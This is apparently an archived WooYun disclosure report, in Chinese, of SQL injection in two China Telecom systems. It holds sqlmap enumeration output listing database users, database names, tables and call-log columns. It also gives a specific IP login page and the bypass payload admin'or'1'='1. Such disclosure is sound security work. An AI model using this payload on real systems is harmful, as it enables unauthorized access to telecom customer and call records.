乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-10: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商已经确认,细节仅向厂商公开 2015-07-24: 细节向核心白帽子及相关领域专家公开 2015-08-03: 细节向普通白帽子公开 2015-08-13: 细节向实习白帽子公开 2015-08-28: 细节向公众公开
运营商安全之中国电信2个系统sql注射
wooyun-2010-065246
这个洞没有修复,我又发现一个买俩个一起提交了吧!第一个:
database management system users privileges:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] adcrbt[*] Audit[*] CustomerService[*] Demo_Login[*] maxcc[*] NewApp[*] PriceReview[*] sa[*] Sales[*] telqq
数据库
[17:29:03] [INFO] retrieved: "ykdavailable databases [15]:[*] ADCRBT[*] lumigent[*] LumigentDemoDB[*] master[*] model[*] msdb[*] nxgjdx[*] palmoil[*] ReportServer[*] ReportServerTempDB[*] sqlldapinfo[*] sqlmaildata[*] telqq[*] tempdb[*] ykdbmailpro
current-tables
Database: nxgjdx[75 tables]+-----------------------------+| dbo.Radio_ProgramList || dbo.[gjdx _Businesstype] || dbo.gjdx_Refer || dbo.gjdx_SMS_SENDEND_201406 || dbo.gjdx_SMS_SENDEND_201407 || dbo.gjdx_SMS_SENDEND_201408 || dbo.gjdx_SMS_SENDEND_201409 || dbo.gjdx_SMS_SENDEND_201410 || dbo.gjdx_SMS_SENDEND_201411 || dbo.gjdx_SMS_SENDEND_201412 || dbo.gjdx_SMS_SENDEND_201501 || dbo.gjdx_SMS_SENDEND_201502 || dbo.gjdx_SMS_SENDEND_201503 || dbo.gjdx_SMS_SENDEND_201504 || dbo.gjdx_SMS_SENDEND_201505 || dbo.gjdx_SMS_SENDEND_201506 || dbo.gjdx_SMS_SENDEND_201507 || dbo.gjdx_SMS_SENDEND_201508 || dbo.gjdx_SMS_SENDEND_201509 || dbo.gjdx_SMS_SENDEND_201510 || dbo.gjdx_SMS_SENDEND_201511 || dbo.gjdx_SMS_SENDEND_201512 || dbo.gjdx_SMS_SENDEND_today || dbo.gjdx_SMS_SENDWAIT || dbo.gjdx_SMS_SENDend || dbo.gjdx_admin || dbo.gjdx_basic || dbo.gjdx_blackname || dbo.gjdx_call_log || dbo.gjdx_call_log_201406 || dbo.gjdx_call_log_201407 || dbo.gjdx_call_log_201408 || dbo.gjdx_call_log_201409 || dbo.gjdx_call_log_201410 || dbo.gjdx_call_log_201411 || dbo.gjdx_call_log_201412 || dbo.gjdx_call_log_201501 || dbo.gjdx_call_log_201502 || dbo.gjdx_call_log_201503 || dbo.gjdx_call_log_201504 || dbo.gjdx_call_log_201505 || dbo.gjdx_call_log_201506 || dbo.gjdx_call_log_201507 || dbo.gjdx_call_log_201508 || dbo.gjdx_call_log_201509 || dbo.gjdx_call_log_201510 || dbo.gjdx_call_log_201511 || dbo.gjdx_call_log_201512 || dbo.gjdx_call_log_temp || dbo.gjdx_call_log_today || dbo.gjdx_config || dbo.gjdx_customer || dbo.gjdx_customergroup || dbo.gjdx_keyword || dbo.gjdx_keyword0 || dbo.gjdx_mobile_accnbr || dbo.gjdx_mobile_prefix || dbo.gjdx_qf_record || dbo.gjdx_qf_record_bak1 || dbo.gjdx_qf_sendnbr || dbo.gjdx_sample || dbo.gjdx_sample_temp || dbo.gjdx_sample_temp_qf || dbo.message || dbo.nxkj_notice_qf || dbo.nxkj_qf || dbo.nxkj_qf_agent || dbo.nxkj_qf_agent_count || dbo.nxkj_sample_qf || dbo.r_admin || dbo.r_log || dbo.shizuishanzhengqi || dbo.t_log || dbo.tel || dbo.test |+-----------------------------+
Database: nxgjdxTable: dbo.gjdx_call_log_201511[18 columns]+---------------+----------+| Column | Type |+---------------+----------+| Atten1 | int || Atten2 | int || Atten3 | int || calleeid | varchar || callerid | varchar || Calllong | bigint || Date1 | datetime || Date2 | datetime || Del_status | int || freechl | int || id | bigint || inbound | tinyint || mobile_prefix | int || opertype | int || optime | bigint || quittime | bigint || remark | tinyint || trunkid | int |+---------------+----------+
我就不dump出来了,估计是通话日志吧!第二个洞:
http://119.60.2.37:2340/login.aspx
账号admin'or'1'='1密码随便
危害等级:高
漏洞Rank:11
确认时间:2015-07-14 17:53
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
暂无
